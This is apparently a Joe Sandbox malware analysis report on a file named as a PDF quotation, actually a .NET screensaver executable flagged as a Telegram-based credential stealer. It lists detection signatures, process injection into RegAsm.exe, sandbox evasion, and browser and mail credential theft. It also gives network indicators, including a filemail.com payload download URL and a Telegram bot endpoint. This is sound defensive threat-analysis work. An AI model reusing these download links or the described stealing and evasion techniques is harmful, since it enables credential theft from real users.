Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
QUOTATION_JANQUOTE312025#U00faPDF.scr

Overview

General Information

Sample name:QUOTATION_JANQUOTE312025#U00faPDF.scr
renamed because original name is a hash value
Original sample name:QUOTATION_JANQUOTE312025PDF.scr
Analysis ID:1619040
MD5:4fc67d8dc05024c14e049d23487a84d7
SHA1:f165b81184848163d0b7e26fb619ba679d53e0ca
SHA256:daaf11fab5350a27cf390581bddac90cdd10be5263f341f8f553983ca684a1b1
Infos:

Detection

Score:100
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Telegram RAT
.NET source code contains potential unpacker
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • QUOTATION_JANQUOTE312025#U00faPDF.scr (PID: 7408 cmdline: "C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr" /S MD5: 4FC67D8DC05024C14E049D23487A84D7)
    • RegAsm.exe (PID: 7908 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000000.00000002.2226699586.0000000007212000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000000.00000002.2212483137.000000000339C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000004.00000002.2945027047.0000000002B99000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000004.00000002.2945027047.0000000002A51000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          Process Memory Space: QUOTATION_JANQUOTE312025#U00faPDF.scr PID: 7408JoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.71f0000.7.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-19T14:21:32.849428+010028032742Potentially Bad Traffic192.168.2.449739132.226.8.16980TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: QUOTATION_JANQUOTE312025#U00faPDF.scrVirustotal: Detection: 26%Perma Link
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

              Location Tracking

              barindex
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: QUOTATION_JANQUOTE312025#U00faPDF.scrStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49741 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 23.237.50.106:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: QUOTATION_JANQUOTE312025#U00faPDF.scrStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2220258995.0000000004351000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2220258995.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2221779344.0000000006660000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: QUOTATION_JANQUOTE312025#U00faPDF.scr, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2220258995.0000000004351000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2220258995.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2221779344.0000000006660000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2220258995.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2227023518.0000000007330000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2220258995.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2227023518.0000000007330000.00000004.08000000.00040000.00000000.sdmp
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_05620040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_056290C1
              Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=8zF_HFRpmGlHEZLIRYVj6h6JKBX6AxrA97KbIRR0rZ0PqDaLJe3QQYXbMA-s&pk_vid=8e2aec8f065dac991739952269c1eb95 HTTP/1.1Host: 1010.filemail.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=8zF_HFRpmGlHEZLIRYVj6h6JKBX6AxrA97KbIRR0rZ0PqDaLJe3QQYXbMA-s&pk_vid=8e2aec8f065dac991739952269c1eb95 HTTP/1.1Host: 1010.filemail.comConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
              Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
              Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
              Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownDNS query: name: checkip.dyndns.org
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49739 -> 132.226.8.169:80
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49741 version: TLS 1.0
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=8zF_HFRpmGlHEZLIRYVj6h6JKBX6AxrA97KbIRR0rZ0PqDaLJe3QQYXbMA-s&pk_vid=8e2aec8f065dac991739952269c1eb95 HTTP/1.1Host: 1010.filemail.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=8zF_HFRpmGlHEZLIRYVj6h6JKBX6AxrA97KbIRR0rZ0PqDaLJe3QQYXbMA-s&pk_vid=8e2aec8f065dac991739952269c1eb95 HTTP/1.1Host: 1010.filemail.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficDNS traffic detected: DNS query: 1010.filemail.com
              Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
              Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
              Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2212483137.0000000003341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1010.filemail.com
              Source: QUOTATION_JANQUOTE312025#U00faPDF.scrString found in binary or memory: http://1010.filemail.com/api/file/get?filekey=8zF_HFRpmGlHEZLIRYVj6h6JKBX6AxrA97KbIRR0rZ0PqDaLJe3QQY
              Source: RegAsm.exe, 00000004.00000002.2945027047.0000000002ADE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
              Source: RegAsm.exe, 00000004.00000002.2945027047.0000000002ADE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.comd
              Source: RegAsm.exe, 00000004.00000002.2945027047.0000000002ADE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2945027047.0000000002ACC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
              Source: RegAsm.exe, 00000004.00000002.2945027047.0000000002A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
              Source: RegAsm.exe, 00000004.00000002.2945027047.0000000002ADE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/d
              Source: RegAsm.exe, 00000004.00000002.2945027047.0000000002ADE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgd
              Source: RegAsm.exe, 00000004.00000002.2945027047.0000000002AFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
              Source: RegAsm.exe, 00000004.00000002.2945027047.0000000002AFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgd
              Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2212483137.0000000003341000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2945027047.0000000002A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2212483137.000000000336F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1010.filemail.com
              Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2212483137.000000000336F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1010.filemail.com/api/file/get?filekey=8zF_HFRpmGlHEZLIRYVj6h6JKBX6AxrA97KbIRR0rZ0PqDaLJe3QQ
              Source: RegAsm.exe, 00000004.00000002.2945027047.0000000002A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2220258995.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2227023518.0000000007330000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
              Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2220258995.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2227023518.0000000007330000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
              Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2220258995.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2227023518.0000000007330000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
              Source: RegAsm.exe, 00000004.00000002.2945027047.0000000002ADE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
              Source: RegAsm.exe, 00000004.00000002.2945027047.0000000002ADE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2945027047.0000000002A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
              Source: RegAsm.exe, 00000004.00000002.2945027047.0000000002ADE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189d
              Source: RegAsm.exe, 00000004.00000002.2945027047.0000000002ADE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
              Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2220258995.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2227023518.0000000007330000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
              Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2220258995.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2212483137.000000000339C000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2227023518.0000000007330000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
              Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2220258995.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2227023518.0000000007330000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownHTTPS traffic detected: 23.237.50.106:443 -> 192.168.2.4:49732 version: TLS 1.2

              System Summary

              barindex
              Source: initial sampleStatic PE information: Filename: QUOTATION_JANQUOTE312025#U00faPDF.scr
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 0_2_06666E5B0_2_06666E5B
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 0_2_0187B8200_2_0187B820
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 0_2_07B1F6E00_2_07B1F6E0
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 0_2_07B1F4080_2_07B1F408
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 0_2_07B1E3800_2_07B1E380
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 0_2_07B1E0180_2_07B1E018
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 0_2_07B000060_2_07B00006
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 0_2_07B000400_2_07B00040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00FD40684_2_00FD4068
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00FD35894_2_00FD3589
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00FDD8A94_2_00FDD8A9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00FD44F04_2_00FD44F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00FD95D84_2_00FD95D8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00FD95C84_2_00FD95C8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00FD3DB04_2_00FD3DB0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0504B2234_2_0504B223
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0506C8C84_2_0506C8C8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0506859E4_2_0506859E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_050677444_2_05067744
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_050668504_2_05066850
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_050642E14_2_050642E1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_050642F04_2_050642F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_050682FB4_2_050682FB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_05628A0D4_2_05628A0D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0562857C4_2_0562857C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_056246164_2_05624616
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_056200404_2_05620040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_056200064_2_05620006
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_05628D5B4_2_05628D5B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_05626FF74_2_05626FF7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_05626E784_2_05626E78
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_05620EA84_2_05620EA8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_05620E984_2_05620E98
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_056289604_2_05628960
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_05625A3B4_2_05625A3B
              Source: QUOTATION_JANQUOTE312025#U00faPDF.scrBinary or memory string: OriginalFilename vs QUOTATION_JANQUOTE312025#U00faPDF.scr
              Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2212483137.000000000362C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs QUOTATION_JANQUOTE312025#U00faPDF.scr
              Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2220258995.0000000004351000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_JANQUOTE312025#U00faPDF.scr
              Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2220258995.00000000043C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_JANQUOTE312025#U00faPDF.scr
              Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2220258995.00000000043C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_JANQUOTE312025#U00faPDF.scr
              Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2220258995.00000000043C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs QUOTATION_JANQUOTE312025#U00faPDF.scr
              Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2212483137.000000000339C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs QUOTATION_JANQUOTE312025#U00faPDF.scr
              Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2227023518.0000000007330000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_JANQUOTE312025#U00faPDF.scr
              Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2211270985.000000000141E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs QUOTATION_JANQUOTE312025#U00faPDF.scr
              Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2221779344.0000000006660000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_JANQUOTE312025#U00faPDF.scr
              Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000000.1681909968.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFtlqpnn.exe> vs QUOTATION_JANQUOTE312025#U00faPDF.scr
              Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2222946703.0000000006C70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameOvvhlmv.dll" vs QUOTATION_JANQUOTE312025#U00faPDF.scr
              Source: QUOTATION_JANQUOTE312025#U00faPDF.scrBinary or memory string: OriginalFilenameFtlqpnn.exe> vs QUOTATION_JANQUOTE312025#U00faPDF.scr
              Source: QUOTATION_JANQUOTE312025#U00faPDF.scrStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6660000.4.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
              Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6660000.4.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
              Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6660000.4.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
              Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6660000.4.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
              Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.43514f0.0.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
              Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.43514f0.0.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
              Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6660000.4.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
              Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6660000.4.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
              Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6660000.4.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6660000.4.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.43514f0.0.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6660000.4.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.43514f0.0.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
              Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.43514f0.0.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
              Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.43514f0.0.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.43514f0.0.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
              Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6660000.4.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
              Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.43514f0.0.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: classification engineClassification label: mal100.troj.spyw.evad.winSCR@3/0@3/3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: NULL
              Source: QUOTATION_JANQUOTE312025#U00faPDF.scrStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: QUOTATION_JANQUOTE312025#U00faPDF.scrStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: RegAsm.exe, 00000004.00000002.2945027047.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2945027047.0000000002B64000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2945027047.0000000002B56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: QUOTATION_JANQUOTE312025#U00faPDF.scrVirustotal: Detection: 26%
              Source: unknownProcess created: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr "C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr" /S
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: mscoree.dllJump to behavior
